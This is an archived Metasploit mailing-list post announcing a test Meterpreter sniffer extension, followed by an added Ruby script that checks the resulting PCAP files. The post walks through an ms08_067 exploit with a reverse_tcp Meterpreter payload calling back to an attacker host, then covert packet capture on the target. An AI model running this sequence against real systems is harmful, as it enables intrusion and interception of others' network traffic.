Metasploit mailing list archives

Meterpreter Sniffer module


From: hdm at metasploit.com (HD Moore)
Date: Sat, 11 Jul 2009 09:38:48 -0500

I committed a test version of the sniffer extension to the SVN trunk. The
module in SVN is compiled with debug support, so you should see lots of
verbose debug prints if you attach a debugger to the process where
meterpreter is running. I could use some help testing this new extension;
so far it looks like there are some cases where the "use sniffer" command
fails (exploiting ms03-026 on win2003 sp0), but there may be others as
well.


To obtain the latest version of Metasploit on UNIX platforms:
   $ svn co https://metasploit.com/svn/framework3/trunk/

To obtain the latest version of Metasploit on Windows:
   1. Download https://metasploit.com/framework-3.3-dev.exe
   2. Execute this and extract the framework to a directory
   3. Inside the extracted directory execute msfupdate.bat
   4. Inside the extracted directory execute msfconsole.bat

This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we have a
license); it can sniff packets from the target system without writing to
the filesystem or installing any drivers. The module automatically
excludes its own control traffic from the packet capture. As of this week,
all Meterpreter communication is now protected by TLS/SSL, including the
packet sniffer data.

To get started with the new module:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.0.139:4444 -> 192.168.0.120:1687)

meterpreter > use sniffer
Loading extension sniffer...success.

meterpreter > help
[snip]
Sniffer Commands
================

     Command             Description
     -------             -----------
     sniffer_dump        Retrieve captured packet data
     sniffer_interfaces  List all remote sniffable interfaces
     sniffer_start       Capture packets on a previously opened interface
     sniffer_stats       View statistics of an active capture
     sniffer_stop        Stop packet captures on the specified interface

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 6 packets to PCAP file /tmp/all.cap

meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 31 packets to PCAP file /tmp/all.cap

The sniffer_dump command will append to an existing PCAP or create a new
one.

-HD
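An added example, not part of HD's post or of the sniffer extension itself: a minimal libpcap-format reader in Ruby that a tester can point at a file produced by sniffer_dump to check two things the post promises, that repeated dumps append packet records to one capture (one global header, not a second header pasted onto the end) and that the extension's own control traffic to LHOST:4444 is absent from the capture. The packet bytes, addresses and timestamps below are constructed inline so the script runs offline; the handler endpoint 192.168.0.139:4444 is taken from the session shown in the post, and the rest of the traffic is made up.

```ruby
# Added example: sanity-check a pcap written by sniffer_dump. Not part of the
# Metasploit sniffer extension; all packet data is constructed here.

PCAP_MAGIC = 0xa1b2c3d4

# libpcap global header (little-endian, version 2.4, link type 1 = Ethernet).
def pcap_global_header
  [PCAP_MAGIC, 2, 4, 0, 0, 65_535, 1].pack('VvvVVVV')
end

# One Ethernet/IPv4/TCP frame for the given 4-tuple. Checksums are left zero;
# they are irrelevant to parsing and this frame is never put on a wire.
def tcp_frame(src_ip, sport, dst_ip, dport, payload)
  eth = "\x00\x0c\x29\x11\x22\x33\x00\x50\x56\xaa\xbb\xcc\x08\x00".b
  tcp = [sport, dport, 1, 1, 0x50, 0x18, 8192, 0, 0].pack('nnNNCCnnn') + payload.b
  ip  = [0x45, 0, 20 + tcp.bytesize, 0, 0x4000, 64, 6, 0].pack('CCnnnCCn') +
        src_ip.split('.').map(&:to_i).pack('C4') +
        dst_ip.split('.').map(&:to_i).pack('C4')
  eth + ip + tcp
end

# pcap record header (ts_sec, ts_usec, incl_len, orig_len) followed by the frame.
def pcap_record(frame, ts_sec)
  [ts_sec, 0, frame.bytesize, frame.bytesize].pack('VVVV') + frame
end

# sniffer_dump appends records to an existing file; mimic that here.
def append_records(pcap_bytes, frames, ts_sec)
  pcap_bytes + frames.map { |f| pcap_record(f, ts_sec) }.join
end

# Parse a pcap byte string into [{ts:, frame:}, ...]. Rejects a wrong magic,
# a truncated record, and a second global header (what a naive append of one
# complete pcap onto another would produce).
def parse_pcap(bytes)
  bytes = bytes.b
  raise 'not a little-endian pcap file' unless bytes[0, 4].unpack1('V') == PCAP_MAGIC
  records = []
  off = 24
  while off < bytes.bytesize
    hdr = bytes[off, 16]
    raise "truncated record header at offset #{off}" if hdr.nil? || hdr.bytesize < 16
    ts_sec, _ts_usec, incl_len, _orig_len = hdr.unpack('VVVV')
    raise "second global header at offset #{off}" if ts_sec == PCAP_MAGIC
    frame = bytes[off + 16, incl_len]
    raise "truncated record at offset #{off}" if frame.nil? || frame.bytesize < incl_len
    records << { ts: ts_sec, frame: frame }
    off += 16 + incl_len
  end
  records
end

# IPv4/TCP 4-tuple [src, sport, dst, dport] of an Ethernet frame, or nil.
def tcp_tuple(frame)
  return nil unless frame[12, 2].unpack1('n') == 0x0800
  ihl = (frame.getbyte(14) & 0x0f) * 4
  return nil unless frame.getbyte(23) == 6
  src = frame[26, 4].unpack('C4').join('.')
  dst = frame[30, 4].unpack('C4').join('.')
  sport, dport = frame[14 + ihl, 4].unpack('nn')
  [src, sport, dst, dport]
end

# Records that touch the Meterpreter handler endpoint in either direction.
# A correct capture from the extension should return none of these.
def handler_traffic(records, lhost, lport)
  records.select do |r|
    t = tcp_tuple(r[:frame])
    t && ((t[0] == lhost && t[1] == lport) || (t[2] == lhost && t[3] == lport))
  end
end

# Constructed sample: a first dump with two ordinary HTTP frames, then a second
# dump appended to it that (deliberately) contains one frame to the handler.
FIRST_DUMP = pcap_global_header +
  pcap_record(tcp_frame('192.168.0.120', 1050, '192.168.0.1', 80, "GET / HTTP/1.0\r\n\r\n"), 1_247_319_000) +
  pcap_record(tcp_frame('192.168.0.1', 80, '192.168.0.120', 1050, "HTTP/1.0 200 OK\r\n\r\n"), 1_247_319_000)

SECOND_DUMP = append_records(
  FIRST_DUMP,
  [tcp_frame('192.168.0.120', 1687, '192.168.0.139', 4444, "\x00" * 8)],
  1_247_319_010
)

if __FILE__ == $PROGRAM_NAME
  recs = parse_pcap(SECOND_DUMP)
  puts "#{recs.size} records in capture"
  handler_traffic(recs, '192.168.0.139', 4444).each do |r|
    puts "control traffic leaked into capture: #{tcp_tuple(r[:frame]).inspect}"
  end
end
```

To use it on a real dump, read the file with `File.binread('/tmp/all.cap')`, pass it to `parse_pcap`, and run `handler_traffic` with the LHOST and LPORT of the session; any hit means the control-traffic exclusion did not work on that interface, which is the kind of case HD is asking testers to report.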


Current thread: